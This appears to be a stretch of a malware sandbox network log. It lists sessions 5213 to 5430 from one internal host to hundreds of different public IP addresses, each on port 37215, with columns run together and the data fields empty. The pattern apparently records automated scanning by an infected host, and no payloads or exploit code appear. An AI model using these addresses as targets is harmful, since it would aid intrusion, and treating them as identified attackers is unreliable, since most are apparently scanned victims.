                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5213192.168.2.2358182217.82.0.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5214192.168.2.2340200157.173.9.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5215192.168.2.2348888157.55.231.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5216192.168.2.234585086.153.228.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5217192.168.2.235830441.10.19.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5218192.168.2.2359334155.192.129.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5219192.168.2.2357448202.254.244.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5220192.168.2.2344896197.26.83.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5221192.168.2.2342736197.85.211.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5222192.168.2.2344140197.41.196.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5223192.168.2.234686441.72.58.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5224192.168.2.2338896197.144.82.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5225192.168.2.233400441.247.253.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5226192.168.2.234673088.197.234.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5227192.168.2.235071689.240.120.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5228192.168.2.2358754216.248.81.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5229192.168.2.2344476190.66.74.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5230192.168.2.233421041.179.87.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5231192.168.2.2348238157.131.31.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5232192.168.2.233951641.247.121.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5233192.168.2.236084690.163.179.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5234192.168.2.234391441.56.80.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5235192.168.2.2340208197.164.196.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5236192.168.2.2341682197.51.121.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5237192.168.2.2358796160.122.162.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5238192.168.2.2338870197.179.193.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5239192.168.2.234575241.228.247.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5240192.168.2.2352346157.233.235.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5241192.168.2.2358688157.184.16.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5242192.168.2.235993641.139.253.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5243192.168.2.2342158197.148.216.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5244192.168.2.234211841.168.130.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5245192.168.2.2350568157.192.30.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5246192.168.2.2356132197.131.187.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5247192.168.2.2357496197.138.150.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5248192.168.2.2352810137.140.141.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5249192.168.2.2359462157.74.192.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5250192.168.2.234216819.225.18.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5251192.168.2.235975096.111.14.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5252192.168.2.2344708197.147.177.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5253192.168.2.235883841.202.52.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5254192.168.2.234127052.62.204.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5255192.168.2.233774041.79.163.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5256192.168.2.2352538197.183.168.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5257192.168.2.233808641.35.11.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5258192.168.2.233931641.55.120.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5259192.168.2.2360758157.207.124.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5260192.168.2.235611042.72.174.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5261192.168.2.2356036179.198.210.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5262192.168.2.235314441.174.18.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5263192.168.2.235690827.97.80.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5264192.168.2.2356698157.152.225.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5265192.168.2.2335492157.240.131.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5266192.168.2.2352198197.37.8.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5267192.168.2.234961051.79.123.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5268192.168.2.2360922115.147.187.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5269192.168.2.2360056157.67.126.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5270192.168.2.234169441.243.43.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5271192.168.2.2340652163.32.248.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5272192.168.2.2335478157.156.139.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5273192.168.2.2333444157.202.102.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5274192.168.2.2359848197.170.191.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5275192.168.2.2346906197.200.248.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5276192.168.2.2355544157.248.196.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5277192.168.2.2345452157.98.0.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5278192.168.2.234097699.129.16.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5279192.168.2.2355264157.87.103.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5280192.168.2.2334584197.208.223.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5281192.168.2.233558641.1.108.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5282192.168.2.234345641.37.150.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5283192.168.2.235584041.190.140.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5284192.168.2.2341120218.172.91.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5285192.168.2.2354320189.111.39.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5286192.168.2.2347634197.187.248.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5287192.168.2.234376452.192.39.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5288192.168.2.2349048109.134.0.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5289192.168.2.2353148197.147.112.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5290192.168.2.2353240197.30.207.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5291192.168.2.235616241.45.55.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5292192.168.2.2346666197.227.191.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5293192.168.2.233506041.39.72.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5294192.168.2.2338544157.38.46.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5295192.168.2.233938642.49.75.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5296192.168.2.2340892197.128.119.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5297192.168.2.234070437.174.107.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5298192.168.2.234799041.120.72.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5299192.168.2.233663441.220.8.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5300192.168.2.2356234213.190.13.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5301192.168.2.2335372157.144.211.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5302192.168.2.234553888.210.145.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5303192.168.2.2346766157.40.215.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5304192.168.2.2341922197.241.74.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5305192.168.2.2358874197.17.63.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5306192.168.2.234878041.160.127.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5307192.168.2.2357940157.125.44.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5308192.168.2.2346452157.159.192.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5309192.168.2.2336280197.185.222.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5310192.168.2.235761253.15.194.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5311192.168.2.2351354157.15.127.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5312192.168.2.2350222189.242.165.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5313192.168.2.2339580157.242.71.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5314192.168.2.235426841.232.222.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5315192.168.2.2338150151.85.247.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5316192.168.2.2351976141.249.63.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5317192.168.2.2346790157.190.11.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5318192.168.2.2346286197.220.62.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5319192.168.2.234785254.69.188.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5320192.168.2.233360841.180.46.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5321192.168.2.234191641.156.161.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5322192.168.2.2350846197.213.37.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5323192.168.2.2354048157.104.81.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5324192.168.2.233403241.164.45.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5325192.168.2.233933641.184.67.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5326192.168.2.2345096197.203.224.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5327192.168.2.235531441.206.254.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5328192.168.2.2348676197.116.113.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5329192.168.2.235881241.221.162.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5330192.168.2.235283482.116.181.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5331192.168.2.2347466197.166.39.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5332192.168.2.2342016157.133.192.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5333192.168.2.2358556197.63.243.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5334192.168.2.2353918157.2.174.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5335192.168.2.2333036157.134.1.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5336192.168.2.2357890218.169.222.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5337192.168.2.2336382197.208.7.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5338192.168.2.2354570155.89.32.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5339192.168.2.2338758159.100.154.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5340192.168.2.233726241.128.56.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5341192.168.2.2334134110.107.24.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5342192.168.2.235449641.169.187.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5343192.168.2.2343346157.57.109.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5344192.168.2.233612641.201.192.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5345192.168.2.2342882155.84.209.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5346192.168.2.2337352157.140.202.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5347192.168.2.2360038157.134.125.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5348192.168.2.233877041.148.84.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5349192.168.2.234630089.191.101.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5350192.168.2.2358652197.231.17.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5351192.168.2.233947241.123.62.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5352192.168.2.2352052157.204.112.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5353192.168.2.235352252.53.235.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5354192.168.2.2354248197.191.158.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5355192.168.2.235925041.54.221.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5356192.168.2.234509841.132.177.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5357192.168.2.2354886157.152.205.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5358192.168.2.234241241.62.215.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5359192.168.2.2341340197.11.56.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5360192.168.2.2339034195.159.246.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5361192.168.2.2352004157.118.101.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5362192.168.2.234707241.178.1.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5363192.168.2.2342408157.93.115.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5364192.168.2.2338304157.130.194.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5365192.168.2.2359566180.234.57.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5366192.168.2.2343438197.45.18.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5367192.168.2.2359562197.222.38.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5368192.168.2.2339788197.107.180.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5369192.168.2.234847641.80.26.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5370192.168.2.233451241.149.18.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5371192.168.2.2334522197.85.114.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5372192.168.2.2358854197.160.183.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5373192.168.2.2334446157.115.0.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5374192.168.2.2337722197.85.65.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5375192.168.2.233733641.5.163.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5376192.168.2.2355594142.248.94.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5377192.168.2.2360600157.185.169.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5378192.168.2.2356576197.224.177.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5379192.168.2.2354804131.16.149.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5380192.168.2.2353274157.169.195.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5381192.168.2.2333434197.151.198.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5382192.168.2.235920041.189.205.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5383192.168.2.236003041.61.154.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5384192.168.2.2344402197.209.149.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5385192.168.2.2338154197.52.57.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5386192.168.2.2338546195.46.173.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5387192.168.2.2359220197.195.118.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5388192.168.2.235830241.67.102.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5389192.168.2.233603441.225.205.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5390192.168.2.2347646204.66.157.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5391192.168.2.235780880.230.216.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5392192.168.2.234216841.106.36.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5393192.168.2.2351870197.6.149.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5394192.168.2.2360328197.217.11.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5395192.168.2.2349614157.21.42.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5396192.168.2.2334238157.83.42.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5397192.168.2.2340970157.199.127.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5398192.168.2.2350264197.13.133.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5399192.168.2.2360472197.96.120.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5400192.168.2.235695641.206.157.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5401192.168.2.2351198197.107.98.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5402192.168.2.234384041.171.121.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5403192.168.2.234892081.43.246.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5404192.168.2.233412441.233.41.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5405192.168.2.233401850.124.129.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5406192.168.2.2348098197.141.127.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5407192.168.2.2344944157.121.108.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5408192.168.2.2356768197.148.181.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5409192.168.2.2343210164.90.140.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5410192.168.2.2348484126.211.184.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5411192.168.2.2343430157.187.41.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5412192.168.2.235445487.253.40.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5413192.168.2.2359772191.65.249.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5414192.168.2.2349630157.111.247.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5415192.168.2.235862241.173.188.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5416192.168.2.233535641.144.106.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5417192.168.2.235452241.71.182.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5418192.168.2.234988041.241.203.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5419192.168.2.2354760109.72.27.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5420192.168.2.2359688109.182.182.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5421192.168.2.233557241.207.164.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5422192.168.2.2349072197.43.234.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5423192.168.2.2345304116.116.253.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5424192.168.2.233329241.171.132.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5425192.168.2.2335676197.206.185.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5426192.168.2.2348320197.224.109.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5427192.168.2.2358560197.201.66.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5428192.168.2.2343984157.156.239.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5429192.168.2.2355340157.118.22.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5430192.168.2.2350874157.180.182.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
